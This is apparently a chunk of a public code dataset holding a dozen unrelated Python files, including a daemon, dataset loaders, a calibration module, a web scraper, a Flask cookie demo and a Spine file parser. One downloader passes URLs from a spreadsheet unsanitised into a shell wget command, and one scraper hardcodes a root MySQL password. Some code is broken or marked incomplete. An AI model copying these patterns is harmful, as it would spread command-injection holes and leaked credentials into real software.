running\n    if (os.path.exists(pidHolder)):\n        print(pidHolder)\n        logger.error('Daemon process already running.')\n        raise RuntimeError('Daemon process already running.')\n    \n    #Attempting first fork\n    try:\n        if (os.fork() > 0):\n            raise SystemExit(0)\n    except OSError as e:\n        logger.error('Failed to execute first fork for daemonize')\n        raise RuntimeError('Failed to execute first fork for daemonize: ' + str(e))\n    \n    #Changing IDs of the process and permissions\n    id = os.getuid()\n    os.chdir('/')\n    os.umask(0)\n    os.setsid()\n    os.setuid(id)\n    os.setgid(id)\n    \n    #Attempting second fork\n    try:\n        if (os.fork() > 0):\n            raise SystemExit(0)\n    except OSError as e:\n        logger.error('Failed to execute second fork for daemonize')\n        raise RuntimeError('Failed to execute second fork for daemonize: ' + str(e))\n    \n    sys.stdout.flush()\n    sys.stderr.flush()\n    \n    with open(stdin, 'rb', 0) as stdReplace:\n        os.dup2(stdReplace.fileno(), sys.stdin.fileno())\n    with open(stdout, 'ab', 0) as stdReplace:\n        os.dup2(stdReplace.fileno(), sys.stdout.fileno())\n    with open(stderr, 'ab', 0) as stdReplace:\n        os.dup2(stdReplace.fileno(), sys.stderr.fileno())\n    \n    dirPath = '/tmp/'\n    newDirName = \"tempDirectory\"\n    path = os.path.join(dirPath, newDirName)\n\n    if os.path.exists(path) == False :\n        os.mkdir(path)\n\n    #use a separate handle name so pidFile keeps holding the path for os.remove below\n    with open(pidFile, 'w') as pidFileHandle:\n        print(os.getpid(), file=pidFileHandle)\n    \n    #Pid file is deleted before exiting\n    atexit.register(lambda: os.remove(pidFile))\n    \ndef sigtermHandler(signo, frame):\n    raise SystemExit(1)\n    \ndef statusLogging():\n    sys.stdout.write(f'Daemon processes given pid {os.getpid()}\\n')\n    \n    while True:\n        sys.stdout.write(f'Daemon running as of: {time.ctime()}\\n')\n        time.sleep(60)\n\nif __name__ == '__main__':\n    connectionData = ('::1', 8080)\n    daemonHost = '::1'\n    daemonPort = 8080\n    pidHolder = '/tmp/tempDirectory/daemonInfo.pid'\n    signal(SIGTERM, sigtermHandler)\n    \n    parser = argparse.ArgumentParser(description = 'Python Milestone 3 Lottery Ticket Data Generator')\n    daemonAction = parser.add_mutually_exclusive_group(required = True)\n    \n    daemonAction.add_argument('-start', action = 'store_const', dest = 'daemonAction',\n                              help = 'starts the daemon if it is not running', \n                              const = 1)\n    \n    daemonAction.add_argument('-stop', action = 'store_const', dest = 'daemonAction', \n                              help = 'Stops the daemon if it is running', \n                              const = 0)\n    \n    parameters = parser.parse_args()\n\n    logzero.logfile('/tmp/daemon-logfile.log', \n                    maxBytes= 1e6, backupCount= 2, 
disableStderrLogger= True)\n \n if (parameters.daemonAction):\n try:\n daemonize(pidHolder, stdout = '/tmp/daemon.log', \n stderr = '/tmp/daemonErrors.log')\n except RuntimeError as e:\n print(e, file = sys.stderr)\n raise SystemExit(1)\n logger.info(f'Started processes with {os.getpid()}')\n try:\n runDaemon()\n except Exception as e:\n logger.error(e)\n raise SystemExit(1)\n \n else:\n if os.path.exists(pidHolder):\n with open(pidHolder) as pidFile:\n os.kill(int(pidFile.read()), SIGTERM)\n \n else:\n logger.error('Daemon is not running!')\n print('Daemon is not running!', file = sys.stderr)\n raise SystemExit(1)\n\n\n\n\n\n\n","repo_name":"drkcn94/Y3S5_Python","sub_path":"m3/m3-daemon.py","file_name":"m3-daemon.py","file_ext":"py","file_size_in_byte":12209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25602211655","text":"import networkx as nx\nimport os\nimport urllib.request as req\nfrom ..Clustering import Clustering\n\n'''\n This file retrieves the datasets from https://github.com/altsoph/community_loglike \n To retrieve the tuple (graph,groundtruth) of a dataset, simply use load_dataset(name).\n The graph is returned as a networkx graph, while the ground truth is returned as a Clustering.\n To retrieve a dictionary indexed by the network names, simply use load_datasets().\n'''\n\nnetwork_names = [\n 'karate',\n 'dolphins',\n 'polbooks',\n 'football',\n 'eu-core',\n 'polblogs',\n 'cora',\n 'as'\n]\n\ndef load_network(url):\n file = req.urlopen(url)\n return nx.read_edgelist(file)\n\n\ndef load_clustering(url):\n file = req.urlopen(url)\n return Clustering(dict([\n l.strip().decode(\"utf-8\").split('\\t')\n for l in file.readlines()\n ]))\n\n\ndef load_dataset(name):\n url_start = \"https://raw.githubusercontent.com/altsoph/community_loglike/master/datasets/{}/{}\".format(\n name if name!=\"cora\" else \"cora_full\", name\n )\n return load_network(url_start + \".edges\"), load_clustering(url_start + \".clusters\")\n\n\ndef load_datasets():\n networks = {\n name: load_dataset(name)\n for name in network_names\n }\n # Sort ascendingly in network size\n networks_sorted = sorted(network_names, key=lambda name: len(networks[name][0]))\n return {\n name: networks[name]\n for name in networks_sorted\n }","repo_name":"MartijnGosgens/hyperspherical_community_detection","sub_path":"experiments/benchmarknetworks.py","file_name":"benchmarknetworks.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40890140710","text":"from __future__ import print_function\nimport os\nimport shutil\nimport subprocess\nimport argparse\nimport sys\nimport re\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', '--vect', nargs='*',default=['SSE', 'AVX'],\n help='vectorization levels (default: [SSE,AVX])')\nparser.add_argument('-n', '--nthreads', nargs='*',\n default=[1,2,4,8],type=int,\n help='sequence of nthreads for benchmarks (default: [1,2,4,8])')\nparser.add_argument('-r', '--runs', nargs='*',\n default=[0,1,2,3,4],type=int,\n help='sequence of runs for benchmarks (default: [0,1,2,3,4])')\nparser.add_argument('-t', '--test', action='store_true',\n help='flag to test script (runs a single iteration)')\nparser.add_argument('-b', '--binq', action='store_true',\n help='flag to submit the binq bench version of the executable')\nparser.add_argument('-d', '--data-dir', type=str, required=True,\n help='data directory with 
coreneuron dataset' )\nparser.add_argument('-w', '--weak-scaling', action='store_true',\n help='activates weak scaling mode (default: off)' )\nparser.add_argument('-s', '--single-thread', action='store_true',\n help='only perform single thread benchmarks (default: off)')\nparser.add_argument('-g', '--single-run', action='store_true',\n help='only perform a single run of the benchmarks (default: off)')\nargs = parser.parse_args()\n\n#### CONFIG\n# base_exec_dir and vect_2_exec are such that:\n# base_exec_dir + vect_2_exec[vec] + '/bin/coreneuron_exec'\n# points to the coreneuron executable\nbase_exec_dir='/home/hpc/ihpc/ihpc029h/soft/coreneuron/'\nvect_2_exec=dict(\n SSE='install-likwid',\n AVX='install-likwid-avx-IVB',\n )\n####\n\ndata_dir=args.data_dir\nvect_levels=args.vect\n\nif args.single_run:\n runs = [0]\nelse:\n runs = args.runs\n\nnthreads = args.nthreads\nif args.test or args.single_thread:\n nthreads = [1]\nnthreads = sorted( nthreads )\nnthreads.reverse()\n#### END CONFIG\n\nbase_dir = os.getcwd()\n\nfor vec in vect_levels:\n base_name = data_dir.split('/')[-1] if data_dir.split('/')[-1] else data_dir.split('/')[-2]\n vec_dir_name = re.split('_[0-9]*cells.*', base_name)[0]\n vec_dir_name += '_' + vec + '_ivb'\n for run in runs:\n run_dir_name = 'run' + str(run)\n experiment_dir = os.path.join( base_dir, vec_dir_name, run_dir_name )\n if not os.path.exists(experiment_dir):\n os.makedirs( experiment_dir )\n shutil.copyfile( 'submit_template.sh', os.path.join( experiment_dir, 'submit.sh' ) )\n\n with open( os.path.join( experiment_dir, 'submit.sh' ), 'r' ) as submit_f:\n filedata = submit_f.read()\n\n filedata = filedata.replace( '##DATA_DIR##', data_dir )\n filedata = filedata.replace( '##RES_DIR##', experiment_dir )\n if not args.binq:\n filedata = filedata.replace( '##EXEC_DIR##', base_exec_dir + vect_2_exec[vec] + '/bin/coreneuron_exec' )\n else:\n filedata = filedata.replace( '##EXEC_DIR##', base_exec_dir + 'install-binq-bench/bin/coreneuron_exec' )\n\n if args.weak_scaling:\n filedata = filedata.replace( '##DUP_FAC##', '$((nthread_socket_0 + 1))' )\n else:\n filedata = filedata.replace( '##DUP_FAC##', str(int(max(nthreads))) )\n\n threads_loop_str = str()\n for nt in nthreads:\n threads_loop_str += str(int(nt-1)) + ' '\n filedata = filedata.replace( '##THREADS_LOOP##', threads_loop_str )\n\n with open( os.path.join( experiment_dir, 'submit.sh' ), 'w' ) as submit_f:\n submit_f.write( filedata )\n\n os.chdir( experiment_dir )\n for nt in nthreads:\n threads_result_dir = os.path.join( experiment_dir, str(nt) + 'n' )\n if not os.path.exists( threads_result_dir ):\n os.makedirs( threads_result_dir )\n subprocess.call( ['qsub', 'submit.sh'] )\n os.chdir( base_dir )\n\n if args.test:\n sys.exit(0)\n\n","repo_name":"RRZE-HPC/BBP-ECM-RA","sub_path":"app-bench/examples/submit_all.py","file_name":"submit_all.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20296256600","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :deep-learning-tools \n@File :multi_download_pic.py\n@IDE :PyCharm \n@Author :hejintao\n@Date :2022/4/20 19:21 \n\"\"\"\nimport pandas as pd\nimport multiprocessing\nimport subprocess\n\nimport sys\nimport os\n\n\ninput_file = sys.argv[1]\noutput_dir = sys.argv[2]\n\n\nclass MyProcessCommand(multiprocessing.Process):\n def __init__(self, queue=None):\n super(MyProcessCommand, self).__init__()\n self.queue = queue\n\n def run(self):\n while 
True:\n                url, cmsid, content = self.queue.get()\n\n            try:\n                # print(url)\n                url_info_1, url_info_2 = url.split(\"/\")[-2:]\n                tag = eval(content)['字幕是否裁剪']\n                output_filename = cmsid + \"_\" + url_info_1 + \"_\" + url_info_2 + \".jpg\"\n                # cropped images are stored under folder 0, uncropped ones under folder 1\n                if tag == '是':\n                    output_filepath = os.path.join(output_dir, '0')\n                elif tag == '否':\n                    output_filepath = os.path.join(output_dir, '1')\n                else:\n                    pass\n                output_filepath = os.path.join(output_filepath, output_filename)\n                command = \"wget \" + url + \" -O \" + output_filepath\n\n                # print(command)\n                status, output = subprocess.getstatusoutput(command)\n            except Exception as e:\n                print(\"Exception: \", e)\n                pass\n\n            self.queue.task_done()\n\n\ndef command(command_list, num_processes=multiprocessing.cpu_count()):\n    with multiprocessing.Manager() as manager:\n        queue = multiprocessing.JoinableQueue()\n        workerList = []\n        for i in range(num_processes):\n            worker = MyProcessCommand(queue=queue)\n            workerList.append(worker)\n            worker.daemon = True\n            worker.start()\n\n        for command in command_list:\n            queue.put(command)\n\n        queue.join()\n\n        for worker in workerList:\n            worker.terminate()\n\n    print(\"Command Success!\")\n\n\ninput_data = pd.read_excel(input_file, header=0)\ninput_list = input_data.values.tolist()\n\ncommand(input_list)\n\n","repo_name":"hejt25/deep-learning-tools","sub_path":"multi_download_pic.py","file_name":"multi_download_pic.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"41054230707","text":"import cv2\nimport glob\nimport numpy as np\n\n\ndef calibrate_camera(images):\n\n    # Pixel coordinates\n    points2D = []\n\n    # coordinates of the checkerboard in checkerboard world space.\n    points3D = []\n\n    # checkerboard pattern detector criteria.\n    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n    # number of rows and columns of the chessboard\n    rows = 5\n    cols = 8\n\n    # square coordinates in real world space\n    obj = np.zeros((rows * cols, 3), np.float32)\n    obj[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)\n\n    # frame size\n    width = images[0].shape[1]\n    height = images[0].shape[0]\n    for frame in images:\n        grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n        success, corners = cv2.findChessboardCorners(grayFrame, (rows, cols), None)\n        if success == True:\n            # Convolution size for detecting corners\n            conv_size = (11, 11)\n            corners = cv2.cornerSubPix(grayFrame, corners, conv_size, (-1, -1), criteria)\n            cv2.drawChessboardCorners(frame, (rows, cols), corners, success)\n            #cv2.imshow('image', frame)\n            cv2.waitKey(500)\n            points2D.append(corners)\n            points3D.append(obj)\n\n    success, cameraMatrix, distCoefs, _, _ = cv2.calibrateCamera(points3D, points2D, (width, height), None, None)\n\n    return cameraMatrix, distCoefs\n\n    def stereo_calibrate(cameraMatrix1, distCoefs1, cameraMatrix2, distCoefs2, folderImages):\n\n        image_names = glob.glob(folderImages)\n        image_names = sorted(image_names)\n        # split the sorted file names between the two cameras, then load the images\n        names1 = image_names[:len(image_names) // 2]\n        names2 = image_names[len(image_names) // 2:]\n\n        images_names1 = []\n        images_names2 = []\n        for img1, img2 in zip(names1, names2):\n            _im = cv2.imread(img1, 1)\n            images_names1.append(_im)\n\n            _im = cv2.imread(img2, 1)\n            images_names2.append(_im)\n\n        criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.0001)\n\n        # number of rows and columns of the chessboard\n        rows = 5\n        columns = 8\n\n        # coordinates of squares in the checkerboard world space\n        objp = 
np.zeros((rows * columns, 3), np.float32)\n objp[:, :2] = np.mgrid[0:rows, 0:columns].T.reshape(-1, 2)\n\n # frame dimensions. Frames should be the same size.\n width = images_names1[0].shape[1]\n height = images_names1[0].shape[0]\n\n # Pixel coordinates of checkerboards\n imgpoints_left = [] # 2d points in image plane.\n imgpoints_right = []\n\n # coordinates of the checkerboard in checkerboard world space.\n objpoints = [] # 3d point in real world space\n\n for frame1, frame2 in zip(images_names1, images_names2):\n gray1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\n gray2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)\n c_ret1, corners1 = cv2.findChessboardCorners(gray1, (5, 8), None)\n c_ret2, corners2 = cv2.findChessboardCorners(gray2, (5, 8), None)\n\n if c_ret1 == True and c_ret2 == True:\n corners1 = cv2.cornerSubPix(gray1, corners1, (11, 11), (-1, -1), criteria)\n corners2 = cv2.cornerSubPix(gray2, corners2, (11, 11), (-1, -1), criteria)\n\n cv2.drawChessboardCorners(frame1, (5, 8), corners1, c_ret1)\n cv2.imshow('img', frame1)\n\n cv2.drawChessboardCorners(frame2, (5, 8), corners2, c_ret2)\n cv2.imshow('img2', frame2)\n cv2.waitKey(500)\n\n objpoints.append(objp)\n imgpoints_left.append(corners1)\n imgpoints_right.append(corners2)\n\n stereocalibration_flags = cv2.CALIB_FIX_INTRINSIC\n success, CM1, dist1, CM2, dist2, R, T, E, F = cv2.stereoCalibrate(objpoints, imgpoints_left, imgpoints_right, cameraMatrix1,\n distCoefs1,\n cameraMatrix2, distCoefs2, (width, height), criteria=criteria,\n flags=stereocalibration_flags)\n\n\n return R, T\n\n# if __name__ == '__main__':\n#\n# imageFolder = ''\n # imagesNames = sorted(glob.glob(images_folder))\n # images = []x\n # for name in images_names:\n # image = cv2.imread(name, 1)\n # images.append(image)\n #calibrate_camera(images)","repo_name":"lfranschman/HoloNav-Grayscale-triangulation","sub_path":"pyapp/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27791785484","text":"\"\"\"\n\nincomplete\n\"\"\"\n\ndef solution(students: list, sandwiches: list) -> int:\n fed_students = 0\n\n while students:\n past_length = len(students)\n new_queue = []\n for i, student in enumerate(students):\n if student != sandwiches[0]:\n new_queue.append(student)\n else:\n students = students[:i] + students[i+1:]\n sandwiches = sandwiches[1:]\n if not sandwiches:\n return fed_students\n fed_students += 1\n if len(new_queue) == past_length:\n return fed_students\n return fed_students\n\n","repo_name":"joeskang/technical-interview-prep","sub_path":"LeetCode/neetcode-course/1700 Number of Students Unable to Eat Lunch.py","file_name":"1700 Number of Students Unable to Eat Lunch.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70078532415","text":"import scripter\nimport pyautogui\n\ni = 1\nPAUSE_MS = 1\npyautogui.PAUSE = PAUSE_MS / 1000\n\ndef foo():\n # buy pot\n # print(pyautogui.position())\n pyautogui.moveTo(330, 230)\n pyautogui.keyDown('shift')\n pyautogui.click()\n\n global i\n print(i)\n i= i + 1\n\nscripter.run(foo)","repo_name":"desmondw/scripts","sub_path":"torchlight/buy_pots.py","file_name":"buy_pots.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7524155503","text":"import numpy as np\r\n\r\nA = 
np.array([[1, 2], [3, 4]])\r\n\r\nquant = A.size\r\nlin, col = A.shape\r\n\r\nfor i in range(lin):\r\n for j in range(col):\r\n if A[i][j] < 2:\r\n print(A[i][j])\r\n\r\n","repo_name":"douglasrodriguess/basic-to-advanced-python-course","sub_path":"07-collections/exercise/part2/Exercise01loop.py","file_name":"Exercise01loop.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73214603776","text":"from manimlib.animation.animation import Animation\nfrom manimlib.constants import *\nfrom manimlib.utils.config_ops import digest_config\n\n\nclass Homotopy(Animation):\n CONFIG = {\n \"run_time\": 3,\n \"apply_function_kwargs\": {},\n }\n\n def __init__(self, homotopy, mobject, **kwargs):\n \"\"\"\n Homotopy a function from (x, y, z, t) to (x', y', z')\n \"\"\"\n def function_at_time_t(t):\n return lambda p: homotopy(p[0], p[1], p[2], t)\n self.function_at_time_t = function_at_time_t\n digest_config(self, kwargs)\n Animation.__init__(self, mobject, **kwargs)\n\n def update_submobject(self, submob, start, alpha):\n submob.points = start.points\n submob.apply_function(\n self.function_at_time_t(alpha),\n **self.apply_function_kwargs\n )\n\n\nclass SmoothedVectorizedHomotopy(Homotopy):\n def update_submobject(self, submob, start, alpha):\n Homotopy.update_submobject(self, submob, start, alpha)\n submob.make_smooth()\n\n\nclass ComplexHomotopy(Homotopy):\n def __init__(self, complex_homotopy, mobject, **kwargs):\n \"\"\"\n Complex Hootopy a function Cx[0, 1] to C\n \"\"\"\n def homotopy(x, y, z, t):\n c = complex_homotopy(complex(x, y), t)\n return (c.real, c.imag, z)\n Homotopy.__init__(self, homotopy, mobject, **kwargs)\n\n\nclass PhaseFlow(Animation):\n CONFIG = {\n \"virtual_time\": 1,\n \"rate_func\": None,\n }\n\n def __init__(self, function, mobject, **kwargs):\n digest_config(self, kwargs, locals())\n Animation.__init__(self, mobject, **kwargs)\n\n def update_mobject(self, alpha):\n if hasattr(self, \"last_alpha\"):\n dt = self.virtual_time * (alpha - self.last_alpha)\n self.mobject.apply_function(\n lambda p: p + dt * self.function(p)\n )\n self.last_alpha = alpha\n\n\nclass MoveAlongPath(Animation):\n def __init__(self, mobject, path, **kwargs):\n digest_config(self, kwargs, locals())\n Animation.__init__(self, mobject, **kwargs)\n\n def update_mobject(self, alpha):\n point = self.path.point_from_proportion(alpha)\n self.mobject.move_to(point)\n","repo_name":"lkevinzc/manim-tut","sub_path":"manimlib/animation/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"22467312633","text":"# Juego de preguntas\ndef check_guess(guess, answer):\n global score # Es una variable local y lo convertimos a global\n still_gressing = True\n attempt = 0\n while still_gressing and attempt < 3:\n if guess.lower() == answer.lower():\n print('Respuesta correcta')\n score += 1\n still_gressing = False\n else:\n if attempt < 2:\n guess = input('Respuesta equivocada, trata de nuevo')\n attempt += 1\n if attempt == 3:\n print('La respuesta correcta es: ',answer)\nscore = 0\nprint('Adivina el animal')\nguess1= input('¿Que oso vive en el polo norte?')\ncheck_guess(guess1, 'Oso polar')\nguess2= input('¿Cual es el animal mas rapido de la tierra?')\ncheck_guess(guess2, 'Leopardo')\nguess3= input('¿Cual es el animal mas grande?')\ncheck_guess(guess3, 'Ballena azul')\nprint('Tu resultado 
es: ' + str(score))","repo_name":"CosterBellido/Python-principiantes","sub_path":"Juego de preguntas.py","file_name":"Juego de preguntas.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"33512180867","text":"import requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nimport pymysql\n# URL that hosts the lottery data\nurl = \"https://datachart.500.com/ssq/\"\n# fetch the data\nresponse = requests.get(url, headers={'User-Agent': UserAgent().chrome})\n# parse it with xpath\ne = etree.HTML(response.text)\ndata_times = e.xpath('//tbody[@id=\"tdata\"]/tr/td[1]/text()')\ntrs = e.xpath('//tbody[@id=\"tdata\"]/tr[not(@class)]')\n# connect to the database\nclient = pymysql.connect(host='localhost', port=3306, user='root', password='lsb19981220', db='ball')\ncursor = client.cursor()\n# SQL for inserting data\nsql = 'insert into t_ball values(0, %s, %s, %s)'\n# check whether a record already exists\nselect_new_sql = \"select * from t_ball where data_time = %s\"\ndata_times.reverse()\n# count how many new records there are\nindex = 0\n\nfor data_time in data_times:\n    result = cursor.execute(select_new_sql, [data_time])\n    if result == 1:\n        break\n    index += 1\nprint(index)\ntrs.reverse()\n\n\nfor data_time, tr in zip(data_times, trs):\n\n    red_ball = '-'.join(tr.xpath('./td[@class=\"chartBall01\"]/text()'))\n    blue_ball = tr.xpath('./td[@class=\"chartBall02\"]/text()')[0]\n    print('Draw ' + data_time + ': red balls: ' + red_ball + ', blue ball: ' + blue_ball)\n    cursor.execute(sql, [data_time, red_ball, blue_ball])\n    client.commit()\ncursor.close()\nclient.close()","repo_name":"lsb567/Python_Reptile","sub_path":"day06/doubleballs.py","file_name":"doubleballs.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"22628491888","text":"# -*- coding: utf-8 -*-#\nfrom flask import Flask, request, Response\nfrom datetime import datetime\nfrom subViews import bp\napp = Flask(__name__)\napp.register_blueprint(bp)\napp.config[\"SERVER_NAME\"] = \"test.com:5000\"\n\n\n@app.route('/')\ndef hello_world():\n    resp = Response(\"Hello World!\")\n    # max_age is in seconds: the cookie expires this many seconds from now\n    # resp.set_cookie(key=\"username\", value=\"xingchen\", max_age=100)\n    # expires takes a datetime; the time it sets is Greenwich Mean Time (GMT)\n    # GMT + 8 hours = UTC+8 (China Standard Time)\n    # although expires is deprecated in the HTTP spec, every browser still supports it so far\n    # max_age is not supported by IE8 and older browsers\n    expires = datetime(year=2019, month=8, day=22, hour=9, minute=14, second=20)\n    # resp.set_cookie(key=\"username\", value=\"xingchen\", expires=expires)\n    # if both max_age and expires are specified, max_age takes precedence\n    resp.set_cookie(key=\"username\", value=\"xingchen\", max_age=600, expires=expires, domain=\".test.com\")\n    return resp\n\n\n@app.route('/del/')\ndef delCookie():\n    resp = Response(\"delete cookie\")\n    resp.delete_cookie(key=\"username\")\n    return resp\n\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"ZhouRuiXiang/Flask_Note","sub_path":"Cookie_Session/flask_cookie_session/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"2595228078","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import (division, print_function, unicode_literals,\n                        absolute_import)\n\nfrom .tag_caracter import TagCaracter\n\n\nclass TagBoolean(TagCaracter):\n    def __init__(self, *args, **kwargs):\n        self.valores_texto = {\n            None: '',\n            True: 'true',\n            False: 'false',\n        }\n        super(TagBoolean, self).__init__(*args, **kwargs)\n        self.valor = None\n\n    
@property\n def valor(self):\n return self._valor\n\n @valor.setter\n def valor(self, valor):\n if isinstance(valor, str):\n self.valor = valor.decode('utf-8')\n\n elif isinstance(valor, unicode):\n if valor.lower() == 'true':\n self.valor = True\n elif valor.lower() == 'false':\n self.valor = False\n else:\n self.valor = None\n\n elif isinstance(valor, bool):\n self._valor = valor\n if self.valor:\n self._texto = 'true'\n else:\n self._texto = 'false'\n\n elif valor is None:\n self._valor = None\n\n self._texto = self.valores_texto[self.valor]\n","repo_name":"danimaribeiro/odoo-erp","sub_path":"server/pybrasil/xml/tag_boolean.py","file_name":"tag_boolean.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21345625675","text":"import json\nimport struct\nfrom io import BytesIO\nfrom typing import BinaryIO\nimport pprint\nimport ctypes\n\n\ndef int_overflow(val):\n maxint = 2147483647\n if not -maxint - 1 <= val <= maxint:\n val = (val + (maxint + 1)) % (2 * (maxint + 1)) - maxint - 1\n return val\n\n\ndef unsigned_right_shitf(n, i):\n if n < 0:\n n = ctypes.c_uint32(n).value\n if i < 0:\n return -int_overflow(n << abs(i))\n # print(n)\n return int_overflow(n >> i)\n\n\nBLEND_MODE = ['normal', 'additive', 'multiply', 'screen']\nATTACHMENT_TYPE = ['region', 'boundingbox', 'mesh', 'weightedmesh', 'linkedmesh', 'weightedlinkedmesh']\n\nTIMELINE_TYPE = ['rotate', 'translate', 'scale', 'shear', 'attachment', 'color']\n\nCURVE_TYPE = ['linear', 'stepped', 'bezier']\n\n\nclass Handler():\n def __init__(self, f: BinaryIO, for_new=True):\n self.f = f\n self.nonessential = False\n self._result = dict()\n self._skin_index = list()\n self.for_new = for_new\n\n def read(self, l=1):\n b = self.f.read(l)\n return b[0] if l == 1 else b\n\n def read_var_int(this, optimizePositive):\n b = this.read()\n result = b & 127\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 7\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 14\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 21\n if ((b & 128) != 0):\n b = this.read()\n result |= (b & 127) << 28\n # return optimizePositive ? 
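The `valor` setter in tag_boolean.py targets Python 2: `str.decode` and the `unicode` type do not exist under Python 3, where those branches would raise. A minimal Python 3 sketch of the same parse, assuming only the 'true'/'false' text convention that `valores_texto` defines:

def parse_boolean(value):
    """Map 'true'/'false' text (any case), bool, or None onto True/False/None."""
    if isinstance(value, bytes):
        value = value.decode('utf-8')
    if isinstance(value, str):
        return {'true': True, 'false': False}.get(value.lower())
    if isinstance(value, bool) or value is None:
        return value
    raise TypeError(f'unsupported type: {type(value)!r}')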
result : result >>> 1 ^ -(result & 1);\n # return result if optimizePositive else ((-1 & (2**32-1)) >> 1) ^ -(result & 1)\n return int_overflow(result) if optimizePositive else unsigned_right_shitf(result, 1) ^ -(result & 1)\n\n def read_string(self):\n char_count = self.read_var_int(True)\n if char_count == 0: return None\n if char_count == 1: return ''\n if char_count == 2: return chr(self.read())\n return self.read(char_count - 1).decode('utf8') # readUtf8_slow\n\n def handle_skeleton(self):\n result = {'hash': self.read_string(),\n 'spine': self.read_string(),\n 'width': self.read_float(),\n 'height': self.read_float()}\n self.nonessential = self.read_bool()\n # print(self.nonessential)\n result['images'] = self.read_string() if self.nonessential else None\n return result\n\n def handle_bones(self):\n result = []\n bones_count = self.read_var_int(True)\n # print(bones_count)\n for i in range(bones_count):\n # print(i, '/', bones_count)\n r = {\n 'name': self.read_string(),\n 'parent': result[self.read_var_int(True)]['name'] if i != 0 else None,\n 'rotation': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float(),\n 'scaleX': self.read_float(),\n 'scaleY': self.read_float(),\n 'shearX': self.read_float(),\n 'shearY': self.read_float(),\n 'length': self.read_float(),\n 'inheritRotation': self.read_bool(),\n 'inheritScale': self.read_bool(),\n }\n if self.nonessential: r['color'] = self.read_rgba8888()\n if self.for_new:\n # transform: Determines how parent bone transforms are inherited:\n # normal, onlyTranslation, noRotationOrReflection, noScale, or noScaleOrReflection.\n # Assume normal if omitted.\n # print((r['name'], r['inheritRotation'], r['inheritScale']))\n r['transform'] = {(True, True): 'normal',\n (True, False): 'noScale',\n (False, True): 'noRotationOrReflection',\n (False, False): 'onlyTranslation'}.get((r['inheritRotation'], r['inheritScale']),\n 'normal')\n result.append(r)\n return result\n\n def rvit(self):\n return self.read_var_int(True)\n\n def get_bone_name(self, index):\n return self._result['bones'][index]['name']\n\n def get_slot_name(self, index):\n return self._result['slots'][index]['name']\n\n def handle_ik(self):\n result = []\n for i in range(self.rvit()):\n result.append({\n 'name': self.read_string(),\n 'bones': [self.get_bone_name(self.rvit()) for i in range(self.rvit())],\n 'target': self.get_bone_name(self.rvit()),\n 'mix': self.read_float(),\n 'bendPositive': (self.read_byte() == 1),\n # for_new: Constraint order can be specified after `3.5.00-beta`\n # The default value is `0`, which means if the value is lost, only first IK Constraint will work.\n 'order': i # data.order = this.getValue(constraintMap, \"order\", 0);\n })\n return result\n\n def handle_transform(self):\n result = []\n for i in range(self.rvit()):\n d = {\n 'name': self.read_string(),\n 'bone': self.get_bone_name(self.rvit()),\n 'target': self.get_bone_name(self.rvit()),\n 'rotation': self.read_float(),\n 'x': self.read_float(),\n 'y': self.read_float(),\n 'scaleX': self.read_float(),\n 'scaleY': self.read_float(),\n 'shearY': self.read_float(),\n 'rotateMix': self.read_float(),\n 'translateMix': self.read_float(),\n 'scaleMix': self.read_float(),\n 'shearMix': self.read_float(),\n 'order': i # same to ik order\n }\n # for (JsonValue boneMap = constraintMap.getChild(\"bones\"); boneMap != null; boneMap = boneMap.next) {\n if self.for_new:\n d['bones'] = [d.pop('bone')]\n result.append(d)\n return result\n\n def handle_slots(self):\n result = []\n slots_count = 
